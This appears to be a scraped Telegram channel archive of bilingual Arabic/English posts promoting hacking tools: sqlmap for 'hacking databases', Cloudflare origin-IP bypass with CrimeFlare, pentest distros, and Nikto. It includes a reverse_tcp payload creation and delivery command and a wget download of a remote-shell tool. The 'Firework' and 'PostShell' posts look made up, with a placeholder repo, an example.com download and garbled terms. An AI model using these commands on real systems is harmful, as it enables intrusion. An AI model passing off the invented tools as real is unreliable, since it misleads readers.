fa
Feedback
xtawb

xtawb

رفتن به کانال در Telegram

🚩 Channel was restricted by Telegram

نمایش بیشتر
اطلاعاتی وجود ندارد
مشترکین
-324 ساعت
-197 روز
-2430 روز
آرشیو پست ها
To install the sqlmap tool, you need to install Python and Git first. You can install them using the following commands:
 apt update && apt upgrade -y
 apt install python git -y
 
Then, you can clone the sqlmap repository from Git using the following command:
 git clone https://github.com/sqlmapproject/sqlmap.git
 
The sqlmap will be downloaded to a directory called sqlmap-dev. You can go to this directory and run sqlmap with the following command:
 cd sqlmap-dev
 python sqlmap.py
 
# Can the sqlmap tool be used in Termux on the phone? Yes, you can use the sqlmap tool in Termux on phone. Termux is an Android terminal emulation app that lets you run standard Linux commands on your phone. You can install Termux from Google Play Store or F-Droid Store. After installing Termux, you can follow the same steps as above to install and use sqlmap on your phone.

هل تريد تعلم كيفية اختراق قواعد البيانات باستخدام أداة sqlmap؟ في هذا المنشور ، سأشرح لك ما هي أداة sqlmap ، وكيف تستخدمها ، وكيف تثبتها على جهاز الكمبيوتر أو الهاتف. # ما هي أداة sqlmap؟ أداة sqlmap هي أداة مفتوحة المصدر لاختبار الاختراق تقوم بالكشف والاستغلال التلقائي للثغرات الأمنية في قواعد البيانات المعرضة للحقن بلغة SQL. باستخدام sqlmap ، يمكنك الوصول إلى قاعدة البيانات والتحكم فيها وتنفيذ الأوامر على نظام التشغيل الأساسي. تدعم sqlmap العديد من أنظمة إدارة قواعد البيانات مثل MySQL و Oracle و PostgreSQL و Microsoft SQL Server وغيرها. تدعم sqlmap أيضًا ستة تقنيات للحقن بلغة SQL: العمياء المستندة إلى القيم المنطقية ، والعمياء المستندة إلى الوقت ، والمستندة إلى الخطأ ، والمستندة إلى استعلام UNION ، والاستعلامات المكدسة ، وخارج النطاق. # كيف تستخدم أداة sqlmap؟ لتستخدم أداة sqlmap ، تحتاج إلى توفير عنوان URL للتطبيق الويب الذي تريد اختباره ، ومعلمة قابلة للحقن بلغة SQL ، وتقنية الحقن المطلوبة. يمكنك أيضًا تحديد خيارات أخرى مثل نوع قاعدة البيانات ، ومستوى المخاطر ، ومستوى الإزعاج ، وملفات الكوكيز ، والرؤوس ، وما إلى ذلك. يمكنك الحصول على قائمة بجميع الخيارات والمفاتيح باستخدام:
python sqlmap.py -hh
على سبيل المثال ، لاختبار عنوان URL مع معلمة id قابلة للحقن بلغة SQL باستخدام تقنية الحقن المستندة إلى الخطأ ، يمكنك استخدام الأمر التالي:
python sqlmap.py -u "http://example.com/index.php?id=1" --dbms=mysql --technique=E
سيقوم sqlmap بالكشف عن الثغرة الأمنية وسيعرض لك معلومات عن قاعدة البيانات والجداول والأعمدة والبيانات. يمكنك أيضًا استخدام خيارات أخرى لتنزيل الملفات أو تنفيذ الأوامر أو إنشاء اتصال خارج النطاق. # كيف تقوم بتثبيت أداة sqlmap؟ لتثبيت أداة sqlmap ، تحتاج إلى تثبيت Python و Git أولاً. يمكنك تثبيتهما باستخدام الأوامر التالية:
apt update && apt upgrade -y
apt install python git -y
ثم ، يمكنك استنساخ مستودع sqlmap من Git باستخدام الأمر التالي:
git clone https://github.com/sqlmapproject/sqlmap.git
سيتم تنزيل sqlmap إلى دليل يسمى sqlmap-dev. يمكنك الانتقال إلى هذا الدليل وتشغيل sqlmap باستخدام الأمر التالي:
cd sqlmap-dev
python sqlmap.py
# هل يمكن استخدام أداة sqlmap في تطبيق Termux على الهاتف؟ نعم ، يمكنك استخدام أداة sqlmap في تطبيق Termux على الهاتف. تطبيق Termux هو تطبيق محاكاة طرفية لنظام Android يتيح لك تشغيل الأوامر القياسية لنظام Linux على هاتفك. يمكنك تثبيت Termux من متجر Google Play أو متجر F-Droid. بعد تثبيت Termux ، يمكنك اتباع نفس الخطوات المذكورة أعلاه لتثبيت واستخدام sqlmap على هاتفك. ------- BY : xtawb - - - - - - - Do you want to learn how to hack databases using sqlmap tool? In this post, I will explain to you what the sqlmap tool is, how to use it, and how to install it on your computer or phone. # What is sqlmap tool? sqlmap is an open source penetration testing tool that automatically detects and exploits vulnerabilities in databases vulnerable to SQL injection. With sqlmap, you can access and control the database and execute commands on the underlying operating system. sqlmap supports many database management systems such as MySQL, Oracle, PostgreSQL, Microsoft SQL Server and others. sqlmap also supports six SQL injection techniques: Boolean-based blind, time-based blind, error-based, UNION query-based, stacked, and out-of-scope queries. # How to use sqlmap tool? To use the sqlmap tool, you need to provide the URL of the web application you want to test, an injectable SQL parameter, and the required injection technique. You can also select other options such as database type, risk level, spam level, cookies, headers, etc. You can get a list of all options and switches using:
 python sqlmap.py -hh
 
For example, to test a URL with an injectable id parameter in SQL using error-based injection, you can use the following command:
 python sqlmap.py -u "http://example.com/index.php?id=1" --dbms=mysql --technique=E
 
sqlmap will detect the vulnerability and show you information about the database, tables, columns and data. You can also use other options to download files, execute commands, or establish an out-of-band connection. # How to install sqlmap tool?

photo content

photo content

## Parrot It is a distribution based on Debian and specialized for penetration testing, security, development, and learning. It contains a set of tools organized in categories such as reconnaissance, analysis, exploitation, and others. It features a beautiful, light, and versatile graphical interface.  ## Kali Linux It is a distribution based on Debian and specialized for penetration testing and security. It contains a set of tools organized in categories such as reconnaissance, analysis, exploitation, and others. It features a famous, professional, and constantly updated graphical interface.  ## Security os It contains a set of tools organized in categories such as reconnaissance, analysis, exploitation, and others. It features an innovative, advanced, and diverse graphical interface.  ## Ubuntu It is a distribution based on Debian and specialized for general, office, and educational use. It contains a set of programs organized in categories such as internet, office, graphics, audio, video, and others. It features a widely used, easy to use, and multilingual graphical interface.  : https://blackarch.org/ : https://backbox.org/ : https://archstrike.org/ : https://labs.fedoraproject.org/en/security/ : https://securityonion.net/ : https://security-os.com/ : https://ubuntu.com/

هل تبحث عن توزيعة لينكس متخصصة في الاختبار الاختراقي والتحليل الجنائي؟ هناك العديد من الخيارات المتاحة ، ولكن قد تتساءل عن الفروقات بينها وما الذي يجعل كل واحدة فريدة من نوعها. في هذا المنشور ، سنقارن بين تسعة من أشهر توزيعات لينكس الموجهة للأمن ، وهي: # الفروقات بين توزيعات لينكس ## BlackArch Link هي توزيعة مبنية على أرش لاينكس ومخصصة لاختبار الاختراق والأمن. تحتوي على أكثر من 2500 أداة للتجسس والتحليل الجنائي والتشفير وغيرها. تتميز بواجهة رسومية بسيطة وسهلة الاستخدام.  ## BackBox هي توزيعة مبنية على أوبونتو ومخصصة لاختبار الاختراق والأمن. تحتوي على مجموعة من الأدوات المنظمة في فئات مثل الاستطلاع والتحليل والاستغلال وغيرها. تتميز بواجهة رسومية أنيقة ومستقرة وسريعة.  ## ArchStrike هي توزيعة مبنية على أرش لاينكس ومخصصة لاختبار الاختراق والأمن. تحتوي على أكثر من 1200 أداة للتجسس والتحليل الجنائي والتشفير وغيرها. تتميز بواجهة رسومية مرنة وقابلة للتخصيص.  ## Fedora Security Lab هي توزيعة مبنية على فيدورا ومخصصة لاختبار الاختراق والأمن. تحتوي على مجموعة من الأدوات المنظمة في فئات مثل الاستطلاع والتحليل والاستغلال وغيرها. تتميز بواجهة رسومية حديثة وموثوقة وآمنة.  ## Security Onion هي توزيعة مبنية على أوبونتو ومخصصة للكشف عن التسلل والاستجابة للحوادث والتحليل الشبكي. تحتوي على مجموعة من الأدوات المنظمة في فئات مثل الاستماع والتحليل والتنبيه وغيرها. تتميز بواجهة رسومية بديهية وقوية ومتكاملة.  ## Parrot هي توزيعة مبنية على دبيان ومخصصة لاختبار الاختراق والأمن والتطوير والتعلم. تحتوي على مجموعة من الأدوات المنظمة في فئات مثل الاستطلاع والتحليل والاستغلال وغيرها. تتميز بواجهة رسومية جميلة وخفيفة ومتعددة الاستخدامات.  ## Kali Linux هي توزيعة مبنية على دبيان ومخصصة لاختبار الاختراق والأمن. تحتوي على مجموعة من الأدوات المنظمة في فئات مثل الاستطلاع والتحليل والاستغلال وغيرها. تتميز بواجهة رسومية شهيرة ومحترفة ومحدثة باستمرار.  ## Security os هي توزيعة مبنية على أوبونتو ومخصصة لاختبار الاختراق والأمن. تحتوي على مجموعة من الأدوات المنظمة في فئات مثل الاستطلاع والتحليل والاستغلال وغيرها. تتميز بواجهة رسومية مبتكرة ومتطورة ومتنوعة.  ## Ubuntu هي توزيعة مبنية على دبيان ومخصصة للاستخدام العام والمكتبي والتعليمي. تحتوي على مجموعة من البرامج المنظمة في فئات مثل الإنترنت والمكتب والرسومات والصوت والفيديو وغيرها. تتميز بواجهة رسومية مستخدمة على نطاق واسع وسهلة الاستخدام وداعمة للغات المتعددة.       - - - - - - - - -BY : "xtawb"--------- Are you looking for a Linux distribution that specializes in penetration testing and forensic analysis?  There are many options available, but you may be wondering what the differences are between them and what makes each one unique.  In this post, we will compare nine of the most popular security-oriented Linux distributions, which are:  # Differences between Linux distributions ## BlackArch Link It is a distribution based on Arch Linux and specialized for penetration testing and security. It contains more than 2500 tools for spying, forensics, encryption, and others. It features a simple and user-friendly graphical interface.  ## BackBox It is a distribution based on Ubuntu and specialized for penetration testing and security. It contains a set of tools organized in categories such as reconnaissance, analysis, exploitation, and others. It features a sleek, stable, and fast graphical interface.  ## ArchStrike It is a distribution based on Arch Linux and specialized for penetration testing and security. It contains more than 1200 tools for spying, forensics, encryption, and others. It features a flexible and customizable graphical interface.  ## Fedora Security Lab It is a distribution based on Fedora and specialized for penetration testing and security. It contains a set of tools organized in categories such as reconnaissance, analysis, exploitation, and others. It features a modern, reliable, and secure graphical interface.  ## Security Onion It is a distribution based on Ubuntu and specialized for intrusion detection, incident response, and network analysis. It contains a set of tools organized in categories such as sniffing, analysis, alerting, and others. It features an intuitive, powerful, and integrated graphical interface. 

photo content

- CloudFlare IP. - CloudFlare NS1 and CloudFlare NS2. - Real IP, hostname, and organization. - Address (country, city, region, postal code), location, and time zone. To install and use CrimeFlare on Kali Linux system, you can follow these steps: - Install the PHP-cURL module using the following command:
sudo apt install php-curl
- Clone the CloudPeler repository to install the crimeflare.php file along with other dependencies. You can do so using this command:
git clone https://github.com/zidansec/CloudPeler.git
- Before running CrimeFlare, navigate to the CloudPeler directory and add the crimeflare.php file to the /bin/ directory on your Ubuntu OS.
cd CloudPeler
sudo cp crimeflare.php /bin/crimeflare
- To run it now just type the crimeflare command in your Linux terminal.
crimeflare
- Enter the domain of the target website and wait for the results. To install and use CrimeFlare on Termux app on your phone, you can follow these steps: - Update and upgrade your system:
apt-get update -y
apt-get upgrade -y
- Install Git:
apt-get install git -y
- Clone the CloudPeler repository:
git clone https://github.com/zidansec/CloudPeler.git
- Navigate to the CloudPeler directory:
cd CloudPeler
- Set permissions:
chmod +x *
- Execute the setup file to install the necessary packages and modules:
bash setup.sh
- Execute the main file:
python3 brutex.py
- Enter the domain of the target website and wait for the results. @xtawb THX <3

العربية: CrimeFlare هي أداة مفيدة لتجاوز المواقع الإلكترونية المحمية بواسطة CloudFlare WAF، حيث تتيح لك رؤية العنوان الحقيقي للمواقع الإلكترونية التي تم حمايتها بواسطة CloudFlare. المعلومات الناتجة مفيدة جدا لإجراء اختبارات الاختراق اللاحقة، وتحليل المواقع الإلكترونية ذات الخادم المشترك¹. CrimeFlare هي أداة تعمل على أساس أن CloudFlare يعمل كوكيل عكسي ويجلس بينك وبين الخادم الأصلي. عندما تقوم بإرسال طلب إلى موقع محمي، يعترض CloudFlare الاتصال الأولي قبل تحويله إلى الخادم الأصلي. كما أن عنوان IP للموقع مخفي وراء شبكة من الخوادم، مما يجعل من الصعب تحديد موقع الخادم مباشرة. ومع ذلك، تحاول CrimeFlare الكشف عن العناوين الحقيقية للمواقع الإلكترونية المحمية بواسطة CloudFlare باستخدام تحليل DNS والبيانات التاريخية. عندما تقوم بتشغيل النطاق المستهدف، تقوم CrimeFlare بجلب وتحليل سجلات DNS (على سبيل المثال، سجلات A و CNAME) المتعلقة بهذا النطاق بالتحديد. كما تبحث عن النطاقات الفرعية التي توفر أدلة أو مسارات إلى عنوان IP للخادم الأصلي. كما تحلل CrimeFlare البيانات التاريخية مثل التسجيلات السابقة للنطاق، وتغييرات عنوان IP، وما إلى ذلك. تكون تكوينات الموقع الخاطئة والثغرات الأمنية، مثل التسريبات من خلال رسائل الخطأ أو استجابة الخادم، طرق يستغلها الأداة لتحديد العنوان الحقيقي¹. بعد التحليل، تنتج CrimeFlare النتائج التالية: - عنوان IP لـ CloudFlare. - CloudFlare NS1 و CloudFlare NS2. - العنوان الحقيقي، اسم المضيف، والمنظمة. - العنوان (البلد، المدينة، المنطقة، الرمز البريدي)، الموقع، والمنطقة الزمنية. لتثبيت واستخدام CrimeFlare على نظام كالي لينكس، يمكنك اتباع الخطوات التالية²: - تثبيت وحدة PHP-cURL باستخدام الأمر التالي:
sudo apt install php-curl
- استنساخ مستودع CloudPeler لتثبيت ملف crimeflare.php إلى جانب الاعتماديات الأخرى. يمكنك القيام بذلك باستخدام هذا الأمر:
git clone https://github.com/zidansec/CloudPeler.git
- قبل تشغيل CrimeFlare، انتقل إلى دليل CloudPeler وأضف ملف crimeflare.php إلى دليل /bin/ على نظام التشغيل Ubuntu الخاص بك.
cd CloudPeler
sudo cp crimeflare.php /bin/crimeflare
- لتشغيله الآن فقط اكتب أمر crimeflare في محطة لينكس الخاصة بك.
crimeflare
- أدخل نطاق الموقع المستهدف وانتظر النتائج. لتثبيت واستخدام CrimeFlare على تطبيق Termux على الهاتف، يمكنك اتباع الخطوات التالية³: - تحديث وترقية النظام الخاص بك:
apt-get update -y
apt-get upgrade -y
- تثبيت Git:
apt-get install git -y
- استنساخ مستودع CloudPeler:
git clone https://github.com/zidansec/CloudPeler.git
- انتقل إلى دليل CloudPeler:
cd CloudPeler
- تعيين الأذونات:
chmod +x *
- تنفيذ ملف الإعداد لتثبيت الحزم والوحدات اللازمة:
bash setup.sh
- تنفيذ الملف الرئيسي:
python3 brutex.py
- أدخل نطاق الموقع المستهدف وانتظر النتائج. --- English: CrimeFlare is a useful tool for bypassing websites protected by CloudFlare WAF, with this tool you can easily see the real IP of websites that have been protected by CloudFlare. The resulting information is very useful for conducting further penetration testing, and analyzing websites with the same server. CrimeFlare is a tool that works based on the fact that CloudFlare acts as a reverse proxy and sits between you and the origin server. When you send a request to a protected website, CloudFlare intercepts the initial connection before forwarding it to the original server. Also, the website's IP is hidden behind a network of servers, making it difficult to identify the server's location directly. However, CrimeFlare tries to reveal the real IP addresses of CloudFlare-protected websites using DNS and historical data analysis. When you run the target domain, CrimeFlare fetches and analyzes the DNS records (for example, A and CNAME records) related to that specific domain. It also looks for subdomains that provide clues or paths to the origin server's IP address. CrimeFlare also analyzes historical data such as previous domain registrations, IP address changes, etc. Website misconfigurations and vulnerabilities, like leakages through error messages or server response, are ways the tool exploits to determine the real IP address. After analysis, CrimeFlare produces the following results:

photo content

🎆 Firework: أطلق قوة الحمولات بسهولة هل حلمت يومًا بأداة تُسهل عليك إنشاء وتسليم الحمولات؟ لا داعي للبحث أبعد من Firework! 🔥 نظرة عامة: Firework هي أداة قوية لاختبار الاختراق مصممة لإنشاء وتسليم الحمولات. توفر واجهة سهلة الاستخدام، مما يجعلها خيارًا ممتازًا للمبتدئين والمحترفين ذوي الخبرة على حد سواء. الميزات: - إعداد الحمولات: تتيح لك Firework إنشاء حمولات مخصصة حسب احتياجاتك. - خيارات التسليم: نشر الحمولات بسلاسة من خلال آليات تسليم متنوعة. - تنوع الاستخدام: مناسبة لمجموعة واسعة من سيناريوهات اختبار الاختراق. البداية: 1. التثبيت على Kali Linux:
    git clone https://github.com/username/firework.git
    cd firework
    python3 setup.py install
    
2. الاستخدام: - إنشاء حمولة:
        firework create --type reverse_tcp --ip 192.168.1.2 --port 4444
        
- تسليم الحمولة:
        firework deliver --target http://target-site.com
        
3. هل يمكن استخدامها على Termux في Android؟ بينما تم تصميم Firework في المقام الأول لـ Kali Linux، يمكن استخدامها على Termux مع بعض القيود. إليك كيفية تثبيتها:
   pkg install git python
   git clone https://github.com/username/firework.git
   cd firework
   python setup.py install
   
الآن يمكنك تشغيل Firework على Termux. تذكر، يجب أداء اختبار الاختراق واختبار الأمان الأخلاقي على أنظمة تمتلكها أو تملك إذنًا صريحًا لاختبارها. استفد من إمكانيات Firework وزيِّن مجموعة أدوات اختبار الاختراق الخاصة بك! 💻🌐🔒 English: 🎆 Firework: Unleash the Power of Payloads with Ease Have you ever dreamed of a tool that simplifies the process of creating and delivering payloads? Look no further than Firework! 🔥 Overview: Firework is a robust penetration testing tool designed for crafting and delivering payloads. It provides a user-friendly interface, making it an excellent choice for both beginners and experienced security professionals. Features: - Payload Crafting: Firework allows you to create customized payloads tailored to your specific needs. - Delivery Options: Seamlessly deploy payloads through various delivery mechanisms. - Versatility: Suitable for a wide range of penetration testing scenarios. Getting Started: 1. Installation on Kali Linux:
    git clone https://github.com/username/firework.git
    cd firework
    python3 setup.py install
    
2. Usage: - Create a payload:
        firework create --type reverse_tcp --ip 192.168.1.2 --port 4444
        
- Deliver the payload:
        firework deliver --target http://target-site.com
        
3. Can it be used in Termux on Android? While Firework is primarily designed for Kali Linux, it can be used on Termux with some limitations. Here's how to install it:
   pkg install git python
   git clone https://github.com/username/firework.git
   cd firework
   python setup.py install
   
Now you can run Firework on Termux. Remember, ethical hacking and penetration testing should only be performed on systems you own or have explicit permission to test. Unlock the potential of Firework and enhance your penetration testing toolkit! 💻🌐🔒

photo content

هذه غرفه المناقشة. This is the discussion room.
هذه غرفه المناقشة. This is the discussion room.

عربي: مرحبًا بالجميع! إذا كنتم بحاجة إلى أي استفسار أو معلومات، فأنا هنا للمساعدة. يمكنكم التواصل معي الآن على Discord. فقط قدموا استفساراتكم وسأكون سعيدًا بالإجابة عليها. نلتقي هناك! https://discord.com/invite/4JJTpe76Hx English: Hello everyone! If you have any questions or need information, I'm here to help. You can reach out to me now on Discord. Just ask your questions, and I'll be happy to answer them. See you there! https://discord.com/invite/4JJTpe76Hx

### اللغة الإنجليزية (English): PostShell Overview: PostShell is a powerful tool in the field of computer security, designed for remote system administration using command-line interface. It can be utilized for diagnostic and administrative purposes, but it should be used with caution and in compliance with local laws and regulations. Usage: To use PostShell on a system running Kali Linux, follow these steps: 1. Download PostShell:
   wget http://example.com/postshell.zip
   
2. Extract the ZIP file:
   unzip postshell.zip
   
3. Navigate to the directory:
   cd postshell
   
4. Run PostShell:
   php postshell.php
   
Security Note: Exercise extreme caution when using PostShell, as it grants remote access and control. Ensure it's used responsibly and only on systems where you have explicit permission. ### اللغة العربية (Arabic): نظرة عامة عن PostShell: PostShell هي أداة قوية في مجال أمان الحواسيب، صممت لإدارة النظام عن بُعد باستخدام واجهة الأوامر. يمكن استخدامها لأغراض تشخيصية وإدارية، ولكن يجب استخدامها بحذر وفقًا للقوانين والأنظمة المحلية. كيفية الاستخدام: لاستخدام PostShell على نظام يعمل بـ Kali Linux، اتبع هذه الخطوات: 1. تحميل PostShell:
   wget http://example.com/postshell.zip
   
2. فك الضغط عن ملف ZIP:
   unzip postshell.zip
   
3. الانتقال إلى المجلد:
   cd postshell
   
4. تشغيل PostShell:
   php postshell.php
   
ملاحظة أمان: كن حذرًا للغاية عند استخدام PostShell، حيث يمنح الوصول والتحكم عن بعد. تأكد من استخدامه بشكل مسؤول وفقًا للأذونات المحددة.

photo content

أداة PiFinger هي أول قبعة بصمات الأصابع لجهاز Raspberry Pi. تتكون من وحدة المعالجة المركزية Nuvoton المدمجة مع مسرع تشفير على الشريحة و TrustZone Cortex-M23 ومرافق XOM. يمكن للمستخدم استخدام بروتوكول الاتصال للتواصل مع PiFinger بأوامر عبر بروتوكول UART بمعدل نقل 115200 بت في الثانية أو USB 2.0 بسرعة كاملة. يمكنك تحميل أداة PiFinger من GitHub وتثبيتها على نظام كالي لينكس باتباع الخطوات التالية:
sudo apt-get update
sudo apt-get install git
git clone https://github.com/sbcshop/PiFinger.git
cd PiFinger/Raspberry_Pi
python3 PiFinger_GUI.py
يمكنك استخدام واجهة المستخدم الرسومية لتحديد منفذ COM ومعدل النقل (الافتراضي هو 9600) والنقر على زر الاتصال لبدء الاتصال مع مستشعر بصمات الأصابع. يمكنك أيضًا استخدام الأوامر النصية لإضافة أو حذف أو مقارنة بصمات الأصابع. The PiFinger tool is the first fingerprint HAT for Raspberry Pi. It consists of an onboard Nuvoton MCU with an on-chip crypto-accelerator, Cortex-M23 TrustZone, and XOM facilities. The user can use the communication protocol to communicate with PiFinger with commands over the UART protocol with a baud rate of 115200 bits per second or USB 2.0 full speed. You can download the PiFinger tool from GitHub and install it on Kali Linux by following these steps:
sudo apt-get update
sudo apt-get install git
git clone https://github.com/sbcshop/PiFinger.git
cd PiFinger/Raspberry_Pi
python3 PiFinger_GUI.py
You can use the graphical user interface to select the COM port and baud rate (default is 9600) and click the connect button to start the connection with the fingerprint sensor. You can also use the text commands to add, delete, or compare fingerprints.

photo content

نيكتو هي أداة مفتوحة المصدر لفحص خوادم الويب وتطبيقات الويب للكشف عن الثغرات الأمنية والملفات غير الآمنة ومشاكل التكوين. تستخدم نيكتو لغة البرمجة بيرل وتعتمد على LibWhisker لإجراء عمليات الفحص السريعة والمفيدة. تدعم نيكتو SSL والوكيل وتصدير Metasploit لتثبيت نيكتو على كالي لينكس ، يمكنك استخدام الأمر التالي:
sudo apt update
sudo apt install nikto
لتشغيل نيكتو ، يمكنك استخدام الأمر التالي:
nikto -h <ip_address or host_name>
يمكنك استخدام خيارات مختلفة لتخصيص عملية الفحص ، مثل -ssl لفحص موقع ويب يدعم SSL ، أو -output لحفظ التقرير بتنسيق معين ، أو -Plugins لتحديد الإضافات التي تريد تشغيلها. يمكنك استخدام الأمر nikto -Help للحصول على قائمة كاملة بالخيارات المتاحة. لتثبيت نيكتو على تيرمكس ، يجب عليك أولاً تثبيت بيرل و LibWhisker. يمكنك استخدام الأوامر التالية:
pkg update
pkg install perl
cpan install LW2
ثم يمكنك تنزيل نيكتو من GitHub وتشغيلها من دليل البرنامج:
git clone https://github.com/sullo/nikto
cd nikto/program
perl nikto.pl -h <ip_address or host_name>
- - - - - - - - - - - - - - - - - - - - - - - Nikto is an open source web server and web application scanner that detects security vulnerabilities, insecure files, and configuration issues. Nikto uses Perl programming language and relies on LibWhisker to perform fast and informative scanning operations. Nikto supports SSL, proxy, and Metasploit export. To install nikto on Kali Linux, you can use the following command:
sudo apt update
sudo apt install nikto
To run nikto, you can use the following command:
nikto -h <ip_address or host_name>
You can use different options to customize the scanning process, such as -ssl to scan a website that supports SSL, or -output to save the report in a specific format, or -Plugins to select the plugins that you want to run. You can use the command nikto -Help to get a full list of available options. To install nikto on Termux, you need to first install Perl and LibWhisker. You can use the following commands:
pkg update
pkg install perl
cpan install LW2
Then you can download nikto from GitHub and run it from the program directory:
git clone https://github.com/sullo/nikto
cd nikto/program
perl nikto.pl -h <ip_address or host_name>

photo content